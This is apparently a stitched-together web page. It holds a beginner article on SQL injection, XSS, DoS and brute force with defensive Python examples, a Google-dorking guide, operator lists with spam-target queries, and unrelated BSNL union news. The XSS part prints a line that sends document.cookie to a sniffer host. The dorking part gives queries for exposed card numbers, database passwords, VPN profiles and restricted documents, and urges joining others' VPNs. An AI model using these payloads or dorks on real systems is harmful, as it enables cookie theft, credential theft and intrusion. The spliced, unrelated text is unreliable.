I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

Many novice developers get so absorbed in writing code that they completely forget about the security of their work. Above all, they forget about vulnerabilities such as SQL injection and XSS. They also pick easy passwords for their administrative panels and fall victim to brute force. What are these attacks and how can they be avoided?

SQL injection

SQL injection is the most common type of attack on databases; it is carried out through a SQL query crafted for a specific DBMS. Many people and even large companies suffer from such attacks. The cause is a developer's mistake in designing the database and, above all, in writing the SQL queries.

An SQL injection attack is possible because input data used in SQL queries is processed incorrectly. If an attacker succeeds, you risk losing not only the contents of the database but also the logins and passwords for the administrative panel. That data is quite enough to take over the site completely or make irreversible changes to it.

The attack can be reproduced in scripts written in PHP, ASP, Perl and other languages. Its success depends more on which DBMS is used and how the script itself is implemented. There are a great many sites vulnerable to SQL injection in the world. This is easy to verify: it is enough to enter "dorks", special search queries for finding vulnerable sites. Here are some of them:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

How are they used? It is enough to enter them into the Google or Yandex search engine. The search engine returns not just a vulnerable site but the specific page with the vulnerability. But we will not stop there; let us make sure the page really is vulnerable. For this it is enough to put a single quote (') after the value id=1. Something like this:

  • inurl:games.php?id=1'

And the site will return an error about the SQL query. What does our hacker need next?

Nothing more than this link to the page with the error. In most cases, further work on the vulnerability is done in the Kali Linux distribution with its utilities for this purpose: inserting the injection code and performing the required operations. How exactly this happens I cannot tell you, but the information is easy to find on the Internet.
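The single-quote test described above works because the site pastes the id parameter straight into the SQL text. The following Python example is added here and is not code from the original article (which talks about PHP sites); it uses an in-memory SQLite table of constructed sample data to show the vulnerable pattern next to the parameterised query that fixes it. The table name, the probe function and the sample rows are assumptions for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample: an in-memory 'games' table standing in for games.php?id=."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO games VALUES (?, ?)",
                     [(1, "Chess"), (2, "Go"), (3, "Checkers")])
    conn.commit()
    return conn


def lookup_unsafe(conn, raw_id):
    """The mistake the article describes: the request parameter is concatenated
    into the SQL text, so the database parses whatever the visitor typed. A lone
    quote breaks the statement, which is exactly the error the article probes for."""
    sql = "SELECT title FROM games WHERE id = '" + raw_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, raw_id):
    """Fix: validate the expected type, then pass the value as a bound parameter.
    Bound values are never interpreted as SQL, whatever characters they contain."""
    if not raw_id.isdigit():
        return []                      # an id must be a plain integer; reject anything else
    sql = "SELECT title FROM games WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(raw_id),))]


def probe(raw_id):
    """Run both versions on one input and return (unsafe_result, safe_result).
    unsafe_result is the string 'SQL error' when the concatenated query fails."""
    conn = make_db()
    try:
        unsafe = lookup_unsafe(conn, raw_id)
    except sqlite3.OperationalError:   # syntax error from the broken statement
        unsafe = "SQL error"
    safe = lookup_safe(conn, raw_id)
    conn.close()
    return unsafe, safe


if __name__ == "__main__":
    for value in ("1", "1'"):
        print(repr(value), "->", probe(value))
```

With the ordinary value "1" both versions return the same row; with "1'" the concatenated query raises a syntax error (the behaviour the article tells you to look for), while the parameterised version simply returns nothing, so the probe reveals no information about the database.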

XSS Attack

This type of attack targets cookies. Users, in turn, are very fond of saving them. Why not? How could we do without them? After all, thanks to cookies we do not re-enter a password for Vk.com or Mail.ru a hundred times, and few people refuse them. But on the Internet a rule often applies, to hackers' benefit: the coefficient of convenience is directly proportional to the coefficient of insecurity.

To carry out an XSS attack, our hacker needs JavaScript knowledge. At first glance the language is very simple and harmless, because it does not have access to the computer's resources. A hacker can work with JavaScript only inside the browser, but that is enough: the main thing is to get the code into the web page.

I won't go into detail about the attack process. I will tell only the basics and the meaning of how this happens.

A hacker can add JS code to some forum or guestbook. The script redirects us to an infected page where code will be executed: be it a sniffer, some kind of storage, or an exploit that will somehow steal our cookies from the cache.

Why JavaScript? Because JavaScript handles web requests well and has access to cookies. But if our script redirects us to some site, the user will easily notice. So the hacker uses a more cunning option: he simply hides the code in an image.

var img = new Image();
img.src = "http://192.168.1.7/sniff.php?" + document.cookie;

We simply create an image and set the address of our script, with the cookie appended, as its source.

How to protect yourself from all this? Very simple - do not follow suspicious links.
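The image trick above only works if the forum echoes the visitor's text into the page unchanged and the browser lets scripts read the session cookie. The Python example below is added here and is not code from the original article; it shows the two server-side defences a developer controls: escaping user text before it is rendered, and marking the session cookie HttpOnly so document.cookie cannot read it. The render functions, the cookie name and the sample comment are assumptions for the demonstration.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: a guestbook comment carrying the cookie-stealing snippet
# from the article, wrapped in a script tag so it would run if rendered raw.
SAMPLE_COMMENT = ('<script>var img = new Image();'
                  'img.src = "http://192.168.1.7/sniff.php?" + document.cookie;'
                  '</script>')


def render_comment_unsafe(text):
    """The vulnerable template: the visitor's text is pasted into the page as-is,
    so any tag in the comment becomes live markup in every reader's browser."""
    return '<div class="comment">' + text + '</div>'


def render_comment_safe(text):
    """Fix: escape the HTML metacharacters (& < > " ') so the browser shows the
    text literally instead of parsing it as markup."""
    return '<div class="comment">' + html.escape(text, quote=True) + '</div>'


def session_cookie_header(session_id):
    """Set-Cookie header for the session. HttpOnly keeps the value out of
    document.cookie, so even a script that does run cannot exfiltrate it;
    Secure restricts it to HTTPS and SameSite limits cross-site sending."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Strict"
    jar["session"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


def contains_live_script(rendered):
    """Crude detection check for a rendered page fragment: a literal <script>
    tag surviving into the output means escaping was skipped somewhere."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_comment_unsafe(SAMPLE_COMMENT))
    print(render_comment_safe(SAMPLE_COMMENT))
    print(session_cookie_header("constructed-session-id"))
```

Escaping is applied at output time, in the template, rather than on input, so the stored comment stays intact and every place it is displayed is protected the same way; the HttpOnly flag is the second layer, for the day some template forgets to escape.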

DoS and DDoS Attacks


DoS (from the English Denial of Service) is a hacker attack on a computer system with the aim of bringing it to failure: creating conditions under which legitimate users of the system cannot access the resources it provides (servers), or can access them only with difficulty. A system failure can also be a step towards its capture if, in an emergency, the software gives out critical information: for example, a version number, part of the program code, and so on. But most often it is a measure of economic pressure: downtime of a service that generates income, the bills from the provider and the measures needed to fend off the attack hit the "target" hard in the pocket. Currently DoS and DDoS attacks are the most popular, since they allow you to bring almost any system to failure without leaving legally significant evidence.

What is the difference between DoS and DDoS attacks?

DoS is an attack built in a clever way. For example, if the server does not check the correctness of incoming packets, a hacker can craft a request that will be processed forever, so that there is not enough processor time to serve other connections. Accordingly, clients will receive a denial of service. But large well-known sites cannot be overloaded or disabled this way: they are armed with fairly wide channels and very powerful servers that easily cope with such a load.

DDoS is essentially the same attack as DoS. But where DoS uses one source of requests, DDoS may well use hundreds or more. Even heavy-duty servers may not cope with such a load. Let me give you an example.

A DoS attack is when you are having a conversation with someone and some ill-mannered person comes up and starts shouting loudly. Talking becomes impossible or very difficult. Solution: call security, who will calm the person down and take him out of the room. A DDoS attack is when thousands of such ill-mannered people run in. In that case the guards will not be able to restrain and remove everyone.

DoS and DDoS attacks are launched from so-called zombie computers: machines belonging to users who have been hacked and do not even suspect that their computer is taking part in an attack on some server.

How to protect yourself from this? In general, there is no way. But you can make the hacker's task harder. To do this, choose good hosting with powerful servers.

Brute force attack

A developer can come up with many protection systems, fully review the scripts he has written, check the site for vulnerabilities, and so on. But at the last step of setting up the site, when all that is left is to put a password on the admin panel, he can forget about one thing. The password!

It is strongly recommended not to set a simple password such as 12345, 1114457, vasya111, etc. It is not recommended to set passwords shorter than 10-11 characters. Otherwise you may be subjected to the most common and least sophisticated attack: brute force.

Brute force is a dictionary-based password-guessing attack using special programs. The dictionaries vary: Latin letters, numeric sequences up to some range, mixed (Latin + numbers), and there are even dictionaries with special symbols such as @#4$%&*~~`'"\? etc.

Of course, this type of attack is easy to avoid: it is enough to come up with a complex password. Even a captcha can save you. Also, if your site is built on a CMS, many of them detect this type of attack and block the IP address. Always remember that the more different characters in the password, the harder it is to guess.

How do hackers work? In most cases they either suspect or already know part of the password. It is logical to assume that a user's password will certainly not consist of 3 or 5 characters, since such passwords lead to frequent break-ins. Basically, hackers take a range of 5 to 10 characters and add a few characters they probably know in advance. Then they generate passwords within the desired ranges; the Kali Linux distribution even has programs for such cases. And voila, the attack no longer takes long, since the dictionary is no longer so large. In addition, a hacker can use the power of a video card: some support CUDA, which increases the guessing rate by as much as 10 times. And now we see that an attack in such a simple way is quite real. And not only sites are subjected to brute force.
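The two defences named in this section are a password policy (length and variety of characters) and blocking an IP address after repeated failures, as many CMSs do. The Python example below is added here and is not code from the original article; it implements both sides: a policy check that also reports the size of the search space a guesser faces, and a per-IP failed-login guard. The thresholds (10 characters, three character classes, 5 failures in 10 minutes, 15-minute ban) are assumptions chosen for the demonstration, with the length taken from the article's advice.

```python
import math
import string
import time
from collections import defaultdict

MIN_LENGTH = 10    # the article's advice: no shorter than 10-11 characters
MIN_CLASSES = 3    # assumed policy: at least three of the four character classes
CLASSES = [string.ascii_lowercase, string.ascii_uppercase,
           string.digits, string.punctuation]


def charset_size(password):
    """Size of the smallest standard alphabet covering every character used.
    This is what a dictionary generator must enumerate at each position."""
    return sum(len(cls) for cls in CLASSES if any(c in cls for c in password))


def search_space_bits(password):
    """log2 of the number of candidates of this length over this alphabet.
    Each extra character or character class multiplies the guessing work."""
    size = charset_size(password)
    return len(password) * math.log2(size) if size else 0.0


def password_ok(password):
    """Policy check for an admin-panel password: returns (accepted, reasons)."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append("shorter than %d characters" % MIN_LENGTH)
    used = sum(1 for cls in CLASSES if any(c in cls for c in password))
    if used < MIN_CLASSES:
        reasons.append("uses only %d character class(es)" % used)
    return (not reasons, reasons)


class LoginGuard:
    """Failed-login counter per source IP. After max_failures within window
    seconds the IP is refused for ban seconds, which turns a fast dictionary
    run into one that needs many hours per handful of guesses."""

    def __init__(self, max_failures=5, window=600, ban=900):
        self.max_failures, self.window, self.ban = max_failures, window, ban
        self.failures = defaultdict(list)   # ip -> timestamps of recent failures
        self.banned_until = {}              # ip -> time at which the ban expires

    def is_blocked(self, ip, now=None):
        now = time.time() if now is None else now
        return self.banned_until.get(ip, 0) > now

    def record_failure(self, ip, now=None):
        """Call on every failed login; returns True if this failure triggered a ban."""
        now = time.time() if now is None else now
        recent = [t for t in self.failures[ip] if now - t <= self.window]
        recent.append(now)
        self.failures[ip] = recent
        if len(recent) >= self.max_failures:
            self.banned_until[ip] = now + self.ban
            self.failures[ip] = []
            return True
        return False

    def record_success(self, ip):
        """A successful login clears the failure history for that IP."""
        self.failures.pop(ip, None)


if __name__ == "__main__":
    for pw in ("12345", "vasya111", "Tr0ub4dor&3x"):
        print(pw, password_ok(pw), "%.1f bits" % search_space_bits(pw))
    guard = LoginGuard()
    for attempt in range(6):
        print("attempt", attempt, "banned:", guard.record_failure("10.0.0.9"))
```

The login check in the panel would call is_blocked before verifying the password and record_failure or record_success afterwards; the counting is per IP so that one attacker cannot lock out everyone, and a ban that expires by itself avoids the opposite problem of turning the lockout into a denial of service against legitimate admins.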

Dear developers, never forget about information security, because today many people, and even states, suffer from such attacks. After all, the biggest vulnerability is a person, who can always be distracted or overlook something. We are programmers, not programmed machines. Always be on the alert, because the loss of information threatens serious consequences!

Obtaining private data does not always mean hacking: sometimes it is published in the public domain. Knowing Google's settings and a little ingenuity will let you find a lot of interesting things, from credit card numbers to FBI documents.

WARNING

All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Everything is connected to the Internet today, with little care taken to restrict access. Therefore a lot of private data becomes the prey of search engines. Spider robots are no longer limited to web pages; they index all content available on the Web and constantly add confidential information to their databases. Learning these secrets is easy: you just need to know how to ask for them.

Looking for files

In capable hands, Google will quickly find everything that is lying around unguarded on the Web, such as personal information and files for official use only. They are often hidden like a key under a doormat: there are no real access restrictions, the data just sits in a back corner of the site where no links lead. The standard Google web interface provides only basic advanced search settings, but even these are enough.

There are two operators you can use to restrict Google searches to files of a certain type: filetype and ext. The first selects the format the search engine determined from the file header, the second the file extension, regardless of the file's actual content. In both cases you specify only the extension. Originally the ext operator was convenient where a file had no distinctive format signature (for example, for searching ini and cfg configuration files, which can contain anything). Now Google's algorithms have changed and there is no visible difference between the operators: the results are the same in most cases.


Filtering the output

By default, Google searches for the entered words, and in general any entered characters, across all files on indexed pages. You can narrow the search scope to a top-level domain, a specific site, or the location of the desired sequence within the files themselves. For the first two options the site operator is used, followed by the name of the domain or the chosen site. For the third, a whole set of operators searches in service fields and metadata: allinurl finds the specified text in the links themselves, allinanchor in anchor text (the text inside <a> tags), allintitle in page titles, allintext in the body of the pages.

Each operator has a lighter version with a shorter name (without the prefix all). The difference is that allinurl will find links containing all the words, while inurl will only find links containing the first of them; the second and subsequent words of the query can appear anywhere on the web pages. The inurl operator also differs from another operator similar in meaning, site: inurl also allows you to find any sequence of characters in the link to the desired document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let us try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes that will expire only in two years (or when their owners get tired of feeding everyone in a row).

Allintext: card number expiration date /2017 cvv

When you read in the news that a young hacker "hacked the servers" of the Pentagon or NASA and stole classified information, in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Such a list surely exists in electronic form, and for convenience or through an oversight it may also sit on the organization's own website. Logically, there will be no links to it, since it is intended for internal use. What words might such a file contain? At the very least, the field "address". All these assumptions are easy to test.


inurl:nasa.gov filetype:xlsx "address"


We use bureaucracy

Such finds are a pleasant trifle. The really solid catch comes from a more detailed knowledge of Google's search operators, the Web itself, and the structure of what you are looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need so that what remains is really valuable data. It is funny that bureaucracy comes to the rescue here: it produces standard formulations that make it convenient to search for secret information that has accidentally leaked onto the Web.

For example, the Distribution statement stamp, mandatory in US Department of Defense paperwork, denotes standardized restrictions on the distribution of a document. The letter A marks public releases containing nothing secret; B, for internal use only; C, strictly confidential, and so on up to F. Separately there is the letter X, which marks especially valuable information constituting a state secret of the highest level. Let those whose duty it is look for such documents; we will limit ourselves to files with the letter C. According to DoDI 5230.24, this marking is assigned to documents containing descriptions of critical technologies subject to export control. Such carefully guarded information can be found on sites in the .mil top-level domain allocated to the US Army.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that only sites of the US Department of Defense and its contractors are collected in the .mil domain. Domain-limited search results are exceptionally clean, and the titles speak for themselves. Searching for Russian secrets this way is practically useless: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound botanical (the "Kiparis" submachine gun, the "Acacia" self-propelled gun) or even fairy-tale-like (the "Pinocchio" heavy flamethrower system).


By carefully examining any document from a site in the .mil domain, you can find other markers to refine your search, for example a reference to the export restrictions "Sec 2751", which is also convenient for searching for interesting technical information. From time to time such documents are removed from the official sites where they once appeared, so if you cannot follow an interesting link in the search results, use the Google cache (the cache operator) or the Internet Archive website.

We climb into the clouds

In addition to accidentally declassified documents from government departments, links to personal files from Dropbox and other storage services that create "private" links to publicly published data occasionally turn up in the Google cache. With alternative and home-made services it is even worse. For example, the following query finds the data of all Verizon customers who have an FTP server enabled on their router and actively use it.

Allinurl:ftp://verizon.net

There are now more than forty thousand such clever people, and in the spring of 2015 there were an order of magnitude more. Instead of Verizon.net you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server you can see files on an external drive connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file download. All the content of such media is indexed by Google and other search engines, so files stored on external drives can be accessed via a direct link.

Peeping configs

Before the wholesale migration to the clouds, simple FTP servers, which were not short of vulnerabilities either, ruled as remote storage. Many of them are still in use today. For example, the popular WS_FTP Professional program stores configuration data, user accounts and passwords in the ws_ftp.ini file. It is easy to find and read, because all entries are stored in plain text and the passwords are encrypted with the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

Decrypting such passwords is easy using the WS_FTP Password Decryptor utility or a free web service.

When people talk about hacking an arbitrary site, they usually mean obtaining a password from the logs and backups of a CMS or the configuration files of an e-commerce application. If you know their typical structure, you can easily specify keywords. Lines like those in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user ID (UID) and a corresponding password (pwd), and all this information is stored in files with the .inc extension. You can search for them like this:

"pwd=" "UID=" ext:inc

We reveal passwords from the DBMS

In the configuration files of SQL servers, user names and email addresses are stored in clear text, and MD5 hashes are recorded instead of passwords. Strictly speaking, decrypting them is impossible, but you can find a match among known hash-password pairs.

To this day there are DBMSs that do not even use password hashing. Their configuration files can simply be viewed in the browser.

Intext:DB_PASSWORD filetype:env

With the arrival of Windows on servers, the registry partly took over the role of configuration files. You can search its branches in exactly the same way, using reg as the file type. For example, like this:

Filetype:reg HKEY_CURRENT_USER "Password"=

Don't Forget the Obvious

Sometimes you can get at classified information with the help of data accidentally exposed and picked up by Google. The ideal case is to find a list of passwords in some common format. Only the most reckless people store account information in a text file, a Word document or an Excel spreadsheet, but there are always enough of them.

Filetype:xls inurl:password

On the one hand, there are many ways to prevent such incidents: set adequate access rights in .htaccess, patch the CMS, do not use dubious third-party scripts, and close other holes. There is also the robots.txt exclusion file, which forbids search engines to index the files and directories listed in it. On the other hand, if the robots.txt on some server differs from the standard one, it immediately becomes clear what they are trying to hide.

The list of directories and files on any site is headed by the standard inscription "Index of". Since for service purposes it must appear in the title, it makes sense to limit the search with the intitle operator. Interesting things can be found in the /admin/, /personal/, /etc/ and even /secret/ directories.
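Everything the queries in the sections above find (ws_ftp.ini, .env files with DB_PASSWORD, .inc files with UID=/pwd=, exported .reg branches, password spreadsheets, restricted DoD markings, listable /admin/ or /personal/ directories) is something a site owner can look for in their own document root before a search engine does. The Python example below is added here and is not code from the original article; it walks a web root and reports such files, and builds a constructed sample tree to run against. The rule list, reason strings and sample files are assumptions for the demonstration, and the rules cover only the patterns named on this page.

```python
import os
import re
import shutil
import tempfile

# File names the article's queries target.
FILENAME_RULES = [
    (re.compile(r"^ws_ftp\.ini$", re.I), "WS_FTP config: accounts and obfuscated passwords"),
    (re.compile(r"\.env$", re.I), "environment file: DB_PASSWORD and other secrets"),
    (re.compile(r"\.inc$", re.I), "PHP include: may carry UID=/pwd= credentials"),
    (re.compile(r"\.pcf$", re.I), "Cisco VPN client profile"),
    (re.compile(r"\.reg$", re.I), "exported Windows registry branch"),
    (re.compile(r"password.*\.xlsx?$", re.I), "spreadsheet named like a password list"),
]
# Strings inside files that the article's queries look for.
CONTENT_RULES = [
    (re.compile(r"^\s*DB_PASSWORD\s*=", re.M), "DB_PASSWORD assignment"),
    (re.compile(r"\bpwd=", re.I), "pwd= credential field"),
    (re.compile(r'"Password"='), "registry Password value"),
    (re.compile(r"DISTRIBUTION STATEMENT [B-FX]\b"), "restricted distribution marking"),
]
# Directories the article names; with autoindex on, a directory without an
# index file is served as an "Index of" listing.
LISTING_DIRS = {"admin", "personal", "etc", "secret"}


def scan_webroot(root):
    """Walk a document root and return sorted (relative path, reason) pairs."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if (rel_dir != "." and os.path.basename(dirpath).lower() in LISTING_DIRS
                and not any(f.lower().startswith("index.") for f in filenames)):
            findings.append((rel_dir + "/", "no index file: directory listing may be exposed"))
        for name in filenames:
            rel = name if rel_dir == "." else rel_dir + "/" + name
            for rx, why in FILENAME_RULES:
                if rx.search(name):
                    findings.append((rel, why))
            try:
                with open(os.path.join(dirpath, name), "r", errors="ignore") as fh:
                    text = fh.read(64 * 1024)      # only the head of large files
            except OSError:
                continue
            for rx, why in CONTENT_RULES:
                if rx.search(text):
                    findings.append((rel, why))
    return sorted(findings)


def build_sample_webroot():
    """Constructed fixture: a fake web root with the kinds of files the article
    shows turning up in search results, plus harmless ones. Returns its path."""
    root = tempfile.mkdtemp(prefix="webroot_")

    def put(rel, body):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

    put("index.html", "<html><body>hello</body></html>\n")
    put("config/.env", "APP_ENV=prod\nDB_PASSWORD=example-not-real\n")
    put("inc/db.inc", "<?php $UID='app'; $pwd='example-not-real'; ?>\n")
    put("backup/ws_ftp.ini", "[site]\nHOST=ftp.example.com\nUID=admin\nPWD=example-not-real\n")
    put("personal/notes.txt", "nothing to see here\n")
    put("docs/readme.txt", "DISTRIBUTION STATEMENT A. Approved for public release.\n")
    put("docs/spec.txt", "DISTRIBUTION STATEMENT C. Constructed sample of a restricted marking.\n")
    return root


def demo():
    """Build the sample tree, scan it, clean up, and return the findings."""
    root = build_sample_webroot()
    try:
        return scan_webroot(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, reason in demo():
        print("%-24s %s" % (path, reason))
```

Run against a real document root, the scan is a pre-publication check: anything it reports should be moved outside the web root or denied in the server configuration rather than merely listed in robots.txt, which, as the section above notes, only tells a reader where to look.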

Follow the updates

Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request URL) and the "real time" filter (&tbs=qdr:1).

Google also implicitly indicates the time interval of the file's last update. Through the graphical web interface you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.

From the address bar one can only guess at a way to limit the output using the &tbs=qdr: construction. The letter y after it specifies a limit of one year (&tbs=qdr:y), m shows results for the last month, w for the week, d for the past day, h for the last hour, n for the last minute, and s for the last second. The most recent results just made known to Google are found with the &tbs=qdr:1 filter.

If you need to write a clever script, it is useful to know that Google's date range is set in Julian format through the daterange operator. For example, this is how you can find PDF documents containing the word confidential that were uploaded between January 1 and July 1, 2015.

Confidential filetype:pdf daterange:2457024-2457205

The range is specified as Julian day numbers without decimals. Converting them from the Gregorian calendar by hand is inconvenient; it is easier to use a date converter.
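The converter can be a few lines of Python, since the standard library's date ordinal differs from the Julian Day Number by a fixed offset. The example below is added here and is not code from the original article; it converts Gregorian dates to and from the integer Julian Day Numbers that daterange takes, and assembles the operator for a range. It reproduces the values in the query above (2457024 for 1 January 2015 and 2457205 for 1 July 2015). The function names are assumptions for the demonstration.

```python
from datetime import date, timedelta

# date(1, 1, 1).toordinal() is 1, and the Julian Day Number of that same day
# in the proleptic Gregorian calendar is 1721426, so the offset is 1721425.
_ORDINAL_TO_JDN = 1721425


def to_jdn(d):
    """Integer Julian Day Number for a date (the form daterange: expects)."""
    return d.toordinal() + _ORDINAL_TO_JDN


def from_jdn(jdn):
    """Inverse conversion, handy for reading back a daterange seen in a query."""
    return date.fromordinal(jdn - _ORDINAL_TO_JDN)


def daterange_operator(start, end):
    """Build the daterange:START-END operator for an inclusive range of dates."""
    if end < start:
        raise ValueError("end date precedes start date")
    return "daterange:%d-%d" % (to_jdn(start), to_jdn(end))


def query_with_daterange(terms, start, end):
    """Append the operator to ordinary query terms."""
    return terms.strip() + " " + daterange_operator(start, end)


def last_n_days(n, today=None):
    """Operator covering the last n days up to today (or a given reference date)."""
    today = today or date.today()
    return daterange_operator(today - timedelta(days=n), today)


if __name__ == "__main__":
    print(query_with_daterange("confidential filetype:pdf", date(2015, 1, 1), date(2015, 7, 1)))
    print(from_jdn(2452389))   # the example range used later in this page
```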

Targeting and filtering again

In addition to specifying additional operators in the search query, they can be passed directly in the URL. For example, the filetype:pdf operator corresponds to the as_filetype=pdf construct. In this way it is convenient to set any refinement. For instance, output of results only from the Republic of Honduras is set by adding cr=countryHN to the search URL, and only from the city of Bobruisk by gcs=Bobruisk. See the developer section for the complete list of parameters.

Google's automation tools are designed to make life easier but often add hassle. For example, a user's city is determined from the user's IP via WHOIS. Based on this information, Google not only balances the load between servers but also changes the search results. Depending on the region, the same query will put different results on the first page, and some may turn out to be completely hidden. To feel like a cosmopolitan and search for information from the viewpoint of any country, put its two-letter code after the gl= directive (gl=country). For example, the code for the Netherlands is NL, while the Vatican and North Korea do not have their own code in Google.

Search results are often cluttered even after applying several advanced filters. In that case it is easy to refine the query by adding a few exclusion words (each preceded by a minus sign). For example, banking, names and tutorial are often used with the word Personal. Therefore cleaner search results will come not from the textbook example of a query but from a refined one:

Intitle:"Index of /Personal/" -names -tutorial -banking

Last Example

A sophisticated hacker is distinguished by providing himself with everything he needs. For example, a VPN is a convenient thing, but it is either expensive or temporary and restricted. Signing up alone is too expensive. Fortunately there are group subscriptions, and with Google's help it is easy to become part of a group. To do this, just find a Cisco VPN configuration file, which has a rather unusual PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles. One query, and you join, for example, the friendly staff of the University of Bonn.

Filetype:pcf vpn OR Group

INFO

Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of a fixed length, look straight away for a decryption service.

The passwords are stored in encrypted form, but Maurice Massard has already written a program to decrypt them and provides it free of charge through thecampusgeeks.com.

With Google's help, hundreds of different types of attacks and penetration tests are carried out. There are many options, affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you are looking for makes it much easier to get the information you need (especially the information that was not meant to be public). Not only Shodan provides interesting ideas, but any database of indexed network resources!

How to search using google.com

Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you compose a search query correctly, using special constructs, you can get the results you are looking for much more efficiently and faster =) In this article I will try to show what and how you need to do in order to search correctly.

Google supports several advanced search operators that have special meaning when searching on google.com. Typically these operators modify the search, or even tell Google to do a completely different type of search. For example, the construct link: is a special operator, and the query link:www.google.com will not perform a normal search but will instead find all web pages that have links to google.com.

Alternative request types

cache: If you include other words in the query, Google will highlight those included words within the cached document.
For example, cache:www.web site will show cached content with the word "web" highlighted.

link: this query will show web pages that contain links to the specified page.
For example: link:www.website will display all pages that have a link to http://www.site

related: Displays web pages that are "related" to the specified web page.
For example, related: www.google.com will list web pages that are similar to the Google home page.

info: will provide some information that Google has about the requested web page.
For example, info:website will show information about our forum =) (Armada - Forum of adult webmasters).

Other information requests

define: The define: query will provide a definition of the words you type after this, compiled from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

stocks: If you start a query with stocks:, Google will treat the rest of the query terms as stock tickers and link to a page showing prepared information for those symbols.
For example, stocks: intel yahoo will show information about Intel and Yahoo. (Note that you must type the ticker symbols, not the company name.)

Request Modifiers

site: If you include site: in your query, Google will limit the results to the websites it finds in that domain.
You can also search within individual zones such as ru, org, com, etc. (site:com, site:ru)

allintitle: If you run a query with allintitle:, Google will limit the results with all the query words in the title.
For example, allintitle: google search will return all Google search pages like images, Blog, etc

intitle: If you include intitle: in your query, Google will restrict results to documents containing that word in the title.
For example, intitle:Business

allinurl: If you run a query with allinurl: Google will limit the results with all the query words in the URL.
For example, allinurl: google search will return documents with google and search in the URL. Also, as an option, you can separate words with a slash (/); then the words on both sides of the slash will be searched within the same page. Example: allinurl: foo/bar

inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
For example, Animation inurl:website

intext: searches only in the text of the page for the specified word, ignoring the title, link text and other things not related to the body. There is also a derivative of this modifier, allintext:, i.e. all words in the query will be searched only in the text, which is also important because words frequently used in links are ignored.
For example, intext:forum

daterange: searches in time frames (daterange:2452389-2452389), dates for time are specified in Julian format.

And finally, all sorts of interesting example queries

Examples of compiling queries for Google. For spammers

inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp "Character Count"

"Message:" inurl:sign.cfm "Sender:"

inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post "Post Comment" "URL"

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

inurl:?action=add “phpBook” “URL”

Intitle:"Submit New Story"

Magazines

inurl:www.livejournal.com/users/mode=reply

inurl:greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Guest book"

Blogs

Inurl:blogger.com/comment.g?”postID”"anonymous"

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:"Post comment"

Inurl:pirillo.com “Post comment”

Forums

Inurl:gate.html?”name=Forums” “mode=reply”

inurl:”forum/posting.php?mode=reply”

inurl:”mes.php?”

inurl:”members.html”

inurl:forum/memberlist.php?”

Messages updated during the month of Jan 2020

16-01-2020

Condolence message

SNEA Expresses Deep Sorrow for the Demise of

Veteran leader

Com K. Viswanathan

CHQ Treasurer of JETA/JTOA (3 Times)

19/11, D block Nandhini flats church road, Chrompet Chennai 44,


15-01-2020


A Vital Breakthrough for Triple Play FTTH service through BSNL:

Open policy for provision of IPTV: The much awaited Policy for Provision of IPTV services through BSNL FTTH by content providers/partners have been issued by BSNL CO.

This venture is touted as BSNL's answer to major private players providing Triple Play services.

By this project, BSNL is going to provide Real Triple Play Service to customers because here Watching TV is not going to consume Internet Data.

This is going to be one major Lifeline for BSNL revival.

